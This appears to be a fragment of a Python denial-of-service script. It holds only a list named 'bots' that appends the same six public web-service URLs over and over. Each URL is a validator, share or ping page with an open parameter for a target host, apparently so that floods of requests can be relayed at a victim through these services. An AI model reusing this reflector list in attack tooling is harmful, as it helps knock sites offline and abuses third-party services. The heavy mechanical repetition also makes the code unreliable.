bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
